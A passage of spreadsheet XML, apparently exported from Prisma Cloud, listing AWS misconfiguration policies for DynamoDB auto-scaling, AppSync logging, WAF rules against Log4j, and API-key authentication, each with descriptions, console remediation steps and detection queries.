          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1576" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1576" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1576" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1576" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1576" t="inlineStr"/>
      <c r="R1576" t="inlineStr"/>
      <c r="S1576" t="inlineStr"/>
      <c r="T1576" t="b">
        <v>0</v>
      </c>
      <c r="U1576" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1576" t="inlineStr">
        <is>
          <t>aws-application-autoscaling-scaling-policy</t>
        </is>
      </c>
      <c r="W1576" t="inlineStr">
        <is>
          <t>This policy identifies AWS DynamoDB tables with auto-scaling disabled.
DynamoDB is a fully managed NoSQL database that provides a highly reliable, scalable, low-latency database solution for applications that require consistent, single-digit millisecond latency at any scale. Auto-scaling functionality allows you to dynamically alter the allocated throughput capacity for your DynamoDB tables based on current traffic patterns. This feature employs the Application Auto Scaling service to automatically boost provisioned read and write capacity to manage unexpected traffic increases and reduce throughput when the workload falls in order to avoid paying for wasted supplied capacity.
It is recommended to enable auto-scaling for the DynamoDB table to ensure efficient resource utilisation, cost optimisation, improved performance, simplified management, and scalability.</t>
        </is>
      </c>
      <c r="X1576" t="inlineStr">
        <is>
          <t>To enable auto-scaling for a DynamoDB table through the AWS Management Console, follow these steps:
1. Sign into the AWS console. Navigate to the DynamoDB console.
2. In the navigation pane, choose 'Tables'.
3. Select the table you want to enable auto-scaling for.
4. Choose the 'Additional settings' tab.
5. In the 'Read/write capacity' section, choose 'Edit'.
6. In the 'Capacity mode' section, choose 'Provisioned'.
7. For 'Table capacity', set 'Auto scaling' to 'On' for read capacity, write capacity, or both.
8. Set the minimum and maximum capacity units, and the target utilization percentage for read and write capacity.
9. Choose 'Save changes'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables</t>
        </is>
      </c>
      <c r="Y1576" t="inlineStr"/>
      <c r="Z1576" t="inlineStr">
        <is>
          <t>config from cloud.resource where Resource.status = Active AND api.name = 'aws-application-autoscaling-scaling-policy' as Y; config from cloud.resource where api.name = 'aws-dynamodb-describe-table' AND json.rule = tableStatus equal ignore case ACTIVE AND billingModeSummary.billingMode does not equal PAY_PER_REQUEST as X; filter 'not($.Y.ResourceName equals $.X.tableName)'; show X;
{"category":"General","resourceTypes":["aws_appautoscaling_target","aws_appautoscaling_policy"]}</t>
        </is>
      </c>
      <c r="AA1576" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1576" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1576" t="inlineStr">
        <is>
          <t>PC-AWS-DYN-1152-CKV2_AWS_16</t>
        </is>
      </c>
      <c r="AD1576" t="b">
        <v>1</v>
      </c>
      <c r="AE1576" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1576" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>4de147de-8ba0-4aff-a387-30817d9504a3</t>
        </is>
      </c>
      <c r="AI1576" t="inlineStr">
        <is>
          <t>59959d2b-2ea4-4ace-9df3-72076f5eb761</t>
        </is>
      </c>
      <c r="AJ1576" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1576" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" t="inlineStr"/>
      <c r="B1577" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1577" s="2" t="inlineStr"/>
      <c r="D1577" t="inlineStr"/>
      <c r="E1577" t="inlineStr"/>
      <c r="F1577" t="inlineStr"/>
      <c r="G1577" t="b">
        <v>0</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1577" t="inlineStr">
        <is>
          <t>aws-apprunner</t>
        </is>
      </c>
      <c r="K1577" t="inlineStr">
        <is>
          <t>Copy of BB</t>
        </is>
      </c>
      <c r="L1577" t="inlineStr"/>
      <c r="M1577" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1577" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1577" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1577" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1577" t="inlineStr"/>
      <c r="R1577" t="inlineStr"/>
      <c r="S1577" t="inlineStr"/>
      <c r="T1577" t="b">
        <v>0</v>
      </c>
      <c r="U1577" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1577" t="inlineStr">
        <is>
          <t>aws-apprunner-service</t>
        </is>
      </c>
      <c r="W1577" t="inlineStr">
        <is>
          <t>BB</t>
        </is>
      </c>
      <c r="X1577" t="inlineStr"/>
      <c r="Y1577" t="inlineStr"/>
      <c r="Z1577" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-apprunner-service' ) AND finding.name = (('AWS EC2 instance with the creation of a new Group with attached policy permission') and ('Sensitive data sent via API endpoint exposed to internet without authentication'))</t>
        </is>
      </c>
      <c r="AA1577" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1577" t="inlineStr">
        <is>
          <t>2024-09-13 17:19:33</t>
        </is>
      </c>
      <c r="AC1577" t="inlineStr"/>
      <c r="AD1577" t="b">
        <v>0</v>
      </c>
      <c r="AE1577" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1577" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>5c33a095-aa99-4d69-acd8-45c3433093d5</t>
        </is>
      </c>
      <c r="AI1577" t="inlineStr">
        <is>
          <t>ca93b52f-96f6-41d3-a2ee-3e0269e193c9</t>
        </is>
      </c>
      <c r="AJ1577" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1577" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1578" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1578" s="2" t="inlineStr"/>
      <c r="D1578" t="inlineStr"/>
      <c r="E1578" t="inlineStr"/>
      <c r="F1578" t="inlineStr"/>
      <c r="G1578" t="b">
        <v>1</v>
      </c>
      <c r="H15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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1578" t="inlineStr">
        <is>
          <t>aws-appsync</t>
        </is>
      </c>
      <c r="K1578" t="inlineStr">
        <is>
          <t>AWS AppSync has field-level logging disabled</t>
        </is>
      </c>
      <c r="L1578" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1578" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1578" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1578" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1578" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1578" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1578" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1578" t="inlineStr"/>
      <c r="T1578" t="b">
        <v>0</v>
      </c>
      <c r="U1578" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1578" t="inlineStr">
        <is>
          <t>aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W1578" t="inlineStr">
        <is>
          <t>This policy identifies an AWS AppSync GraphQL API not configured with field-level logging with either 'ERROR' or 'ALL'.
AWS AppSync is a managed GraphQL service that simplifies the development of scalable APIs. Field-level logging in AWS AppSync lets you capture detailed logs for specific fields in your GraphQL API. Without enabling field-level logging, the security monitoring and debugging capabilities may be compromised, increasing the risk of undetected threats and vulnerabilities.
It is recommended to enable field-level logging to ensure granular visibility into API requests, aiding in security, and compliance with regulatory requirements.</t>
        </is>
      </c>
      <c r="X1578" t="inlineStr">
        <is>
          <t>To turn on field-level logging on an AWS AppSync GraphQL API,
1. Sign in to the AWS Management Console.
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. In the navigation pane, choose 'AWS AppSync' under the 'Front-end Web &amp; Mobile' section.
4. On the APIs page, choose the name of a reported GraphQL API.
5. On your API's homepage, in the navigation pane, choose Settings.
6. Under Logging, Turn on Enable Logs.
7. Under Field resolver log level, choose your preferred field-level logging level Error or All according to your business requirements.
8. Under Create or use an existing role, choose New role to create a new AWS Identity and Access Management (IAM) that allows AWS AppSync to write logs to CloudWatch. Or, choose the Existing role to select the Amazon Resource Name (ARN) of an existing IAM role in your AWS account.
9. Choose Save. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled</t>
        </is>
      </c>
      <c r="Y1578" t="inlineStr"/>
      <c r="Z1578" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-appsync-graphql-api' AND json.rule = logConfig.fieldLogLevel is not member of ('ERROR','ALL')
{"category":"General","resourceTypes":["AWS::AppSync::GraphQLApi", "aws_appsync_graphql_api"]}</t>
        </is>
      </c>
      <c r="AA1578" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1578" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1578" t="inlineStr">
        <is>
          <t>PC-AWS-ASY-1151-CKV_AWS_194</t>
        </is>
      </c>
      <c r="AD1578" t="b">
        <v>1</v>
      </c>
      <c r="AE1578" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1578" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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8" t="inlineStr">
        <is>
          <t>53f3d4fd-c735-4eae-bdfa-cedec9126d68</t>
        </is>
      </c>
      <c r="AI1578" t="inlineStr">
        <is>
          <t>bffc2f87-93bd-44fe-b73a-be84220fa8eb</t>
        </is>
      </c>
      <c r="AJ1578" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1578" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" t="inlineStr">
        <is>
          <t>CIS Controls v8, CIS Controls v8.1, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, FFIEC, PCI DSS v4.0, ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, NYDFS 23 CRR-NY 500.0, CIS Controls v7.1, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, ISO/IEC 27001:2022, NIST CSF v2.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B1579" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1579" s="2" t="inlineStr"/>
      <c r="D1579" t="inlineStr"/>
      <c r="E1579" t="inlineStr"/>
      <c r="F1579" t="inlineStr"/>
      <c r="G1579" t="b">
        <v>1</v>
      </c>
      <c r="H15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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1579" t="inlineStr">
        <is>
          <t>aws-appsync</t>
        </is>
      </c>
      <c r="K1579" t="inlineStr">
        <is>
          <t>AWS AppSync attached WAFv2 WebACL is not configured with AMR for Log4j Vulnerability</t>
        </is>
      </c>
      <c r="L1579" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1579" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1579" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1579" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1579" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1579" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1579" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S1579" t="inlineStr"/>
      <c r="T1579" t="b">
        <v>0</v>
      </c>
      <c r="U1579" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1579" t="inlineStr">
        <is>
          <t>aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W1579" t="inlineStr">
        <is>
          <t>This policy identifies AppSync attached with WAFv2 WebACL which is not configured with AWS Managed Rules (AMR) for Log4j Vulnerability. As per the guidelines given by AWS, AppSync attached with WAFv2 WebACL should be configured with AWS Managed Rules (AMR) AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList to protect from Log4j Vulnerability (CVE-2021-44228).
For more information please refer below URL,
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/</t>
        </is>
      </c>
      <c r="X1579" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. Go to the AppSync console
3. Click on the reported AppSync
4. Choose 'Settings' in the navigation pane
5. In the Web application firewall section, note down the associated AWS WAF web ACL
6. Go to the noted WAF web ACL in AWS WAF &amp; Shield Service
7. Under 'Rules' tab click on 'Add rules' and select 'Add managed rule groups'
8. Under 'AWS managed rule groups' enable 'Anonymous IP list' and 'Known bad inputs'
9. Click on 'Add rules'</t>
        </is>
      </c>
      <c r="Y1579" t="inlineStr"/>
      <c r="Z1579" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-appsync-graphql-api' AND json.rule = wafWebAclArn is not empty as X; config from cloud.resource where api.name = 'aws-waf-v2-web-acl-resource' AND json.rule = (webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesAnonymousIpList or webACL.postProcessFirewallManagerRuleGroups.firewallManagerStatement.name does not contain AWSManagedRulesKnownBadInputsRuleSet) and NOT ( webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesAnonymousIpList and webACL.rules[*].statement.managedRuleGroupStatement.name contains AWSManagedRulesKnownBadInputsRuleSet ) as Y; filter '$.Y.webACL.arn equals $.X.wafWebAclArn'; show X;</t>
        </is>
      </c>
      <c r="AA1579" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1579" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1579" t="inlineStr">
        <is>
          <t>PC-AWS-ASY-835</t>
        </is>
      </c>
      <c r="AD1579" t="b">
        <v>1</v>
      </c>
      <c r="AE1579" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1579" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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79" t="inlineStr">
        <is>
          <t>efecd50f-5a1f-4d6d-b862-8e760b9612e4</t>
        </is>
      </c>
      <c r="AI1579" t="inlineStr">
        <is>
          <t>ad83c867-f484-4692-930d-9db4b3e2738e</t>
        </is>
      </c>
      <c r="AJ1579" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1579" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" t="inlineStr">
        <is>
          <t>CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, PCI DSS v4.0, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27002:2022, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B1580" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1580" s="2" t="inlineStr"/>
      <c r="D1580" t="inlineStr"/>
      <c r="E1580" t="inlineStr"/>
      <c r="F1580" t="inlineStr"/>
      <c r="G1580" t="b">
        <v>1</v>
      </c>
      <c r="H15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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1580" t="inlineStr">
        <is>
          <t>aws-appsync</t>
        </is>
      </c>
      <c r="K1580" t="inlineStr">
        <is>
          <t>AWS AppSync not configured with AWS Web Application Firewall v2 (AWS WAFv2)</t>
        </is>
      </c>
      <c r="L1580" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1580" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1580" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1580" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1580" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1580" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1580" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S1580" t="inlineStr"/>
      <c r="T1580" t="b">
        <v>0</v>
      </c>
      <c r="U1580" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1580" t="inlineStr">
        <is>
          <t>aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W1580" t="inlineStr">
        <is>
          <t>This policy identifies AWS AppSync which is not configured with AWS Web Application Firewall. As a best practice, enable the AWS WAF service on AppSync to protect against application layer attacks. To block malicious requests to your AppSync, define the block criteria in the WAF web access control list (web ACL).</t>
        </is>
      </c>
      <c r="X1580" t="inlineStr">
        <is>
          <t>To configure AppSync with AWS WAF, follow the below URL:
https://docs.aws.amazon.com/appsync/latest/devguide/WAF-Integration.html</t>
        </is>
      </c>
      <c r="Y1580" t="inlineStr"/>
      <c r="Z1580" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-appsync-graphql-api' AND json.rule = wafWebAclArn does not exist</t>
        </is>
      </c>
      <c r="AA1580" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1580" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1580" t="inlineStr">
        <is>
          <t>PC-AWS-ASY-832</t>
        </is>
      </c>
      <c r="AD1580" t="b">
        <v>1</v>
      </c>
      <c r="AE1580" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1580" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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0" t="inlineStr">
        <is>
          <t>9117b0ea-1f50-43c8-8c52-9e99367f9989</t>
        </is>
      </c>
      <c r="AI1580" t="inlineStr">
        <is>
          <t>a46b7a76-2660-4136-afd3-9a50f372abf4</t>
        </is>
      </c>
      <c r="AJ1580" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1580" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, SOC 2, NYDFS 23 CRR-NY 500.0, ITSG-33, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B1581" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1581" s="2" t="inlineStr"/>
      <c r="D1581" t="inlineStr"/>
      <c r="E1581" t="inlineStr"/>
      <c r="F1581" t="inlineStr"/>
      <c r="G1581" t="b">
        <v>1</v>
      </c>
      <c r="H15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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1581" t="inlineStr">
        <is>
          <t>aws-appsync</t>
        </is>
      </c>
      <c r="K1581" t="inlineStr">
        <is>
          <t>AWS AppSync GraphQL API is authenticated with API key</t>
        </is>
      </c>
      <c r="L1581" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1581" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1581" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1581" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1581" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1581" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R1581" t="inlineStr">
        <is>
          <t>T1526 - Cloud Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S1581" t="inlineStr"/>
      <c r="T1581" t="b">
        <v>0</v>
      </c>
      <c r="U1581" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1581" t="inlineStr">
        <is>
          <t>aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W1581" t="inlineStr">
        <is>
          <t>This policy identifies the AWS AppSync Graphql API using API key for primary or additional authentication methods.
AWS AppSync GraphQL API is a fully managed service by Amazon Web Services for building scalable and secure GraphQL APIs. An API key is a hard-coded value in your application generated by the AWS AppSync service when you create an unauthenticated GraphQL endpoint. Using API keys for authentication can pose security risks such as exposure to unauthorized access and limited control over access privileges, potentially compromising sensitive data and system integrity.
It is recommended to use authentication methods other than API Keys like IAM, Amazon Cognito User Pools, or OpenID Connect providers for securing AWS AppSync GraphQL APIs, to ensure enhanced security and access control.</t>
        </is>
      </c>
      <c r="X1581" t="inlineStr">
        <is>
          <t>Note: Changing the API authorization mode from API key to other methods could cause potential disruptions to existing clients or applications relying on API key authentication. It may require updates to client configurations and authentication workflows for your applications.
To update the Primary authorization mode option for your AWS AppSync GraphQL API, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Front-end Web &amp; Mobile', select 'AWS AppSync'
4. Under the 'APIs' section, select the AppSync API that is reported
5. Navigate to the 'Settings page' from the left panel, Click 'Edit' on the 'Primary authorization mode' section
6. In the 'Primary authorization mode' window, change the 'Authorization mode' from 'API key' to other authentication methods and configure it according to your business requirements
7. Click 'Save'
To update the Additional authorization modes for your AWS AppSync GraphQL API, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Front-end Web &amp; Mobile', select 'AWS AppSync'
4. Under the 'APIs' section, select the AppSync API that is reported
5. Navigate to the 'Settings page' from the left panel, and click 'Add' in the 'Additional authorization modes' section.
6. In the 'Additional authorization mode' window, select any 'Authorization mode' except 'API key' and configure according to your business requirements, and click 'Add'
7. Navigate to the 'Settings page' from the left panel, select the 'API key' in the 'Authorization mode' column from the 'Additional authorization modes' section, and click 'Delete' to remove the API key authorization mode</t>
        </is>
      </c>
      <c r="Y1581" t="inlineStr"/>
      <c r="Z1581" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-appsync-graphql-api' AND json.rule = authenticationType equals "API_KEY" or additionalAuthenticationProviders[?any( authenticationType equals "API_KEY" )] exists</t>
        </is>
      </c>
      <c r="AA1581" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1581" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1581" t="inlineStr">
        <is>
          <t>PC-AWS-ASY-1180</t>
        </is>
      </c>
      <c r="AD1581" t="b">
        <v>1</v>
      </c>
      <c r="AE1581" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1581" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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1" t="inlineStr">
        <is>
          <t>a0862fa8-256a-458f-9a63-192add13a53f</t>
        </is>
      </c>
      <c r="AI1581" t="inlineStr">
        <is>
          <t>b5b1d9bb-1d61-45e3-961e-3a417aba7e40</t>
        </is>
      </c>
      <c r="AJ1581" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1581" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" t="inlineStr">
        <is>
          <t>HIPAA, GDPR, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, SOC 2, DORA, ITSG-33, Microsoft Cloud Security Benchmark v1, SOC 2, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1582" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1582" s="2" t="inlineStr"/>
      <c r="D1582" t="inlineStr"/>
      <c r="E1582" t="inlineStr"/>
      <c r="F1582" t="inlineStr"/>
      <c r="G1582" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1582" t="inlineStr">
        <is>
          <t>aws-athena</t>
        </is>
      </c>
      <c r="K1582" t="inlineStr">
        <is>
          <t>AWS Athena Workgroup data encryption at rest not configured</t>
        </is>
      </c>
      <c r="L1582" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
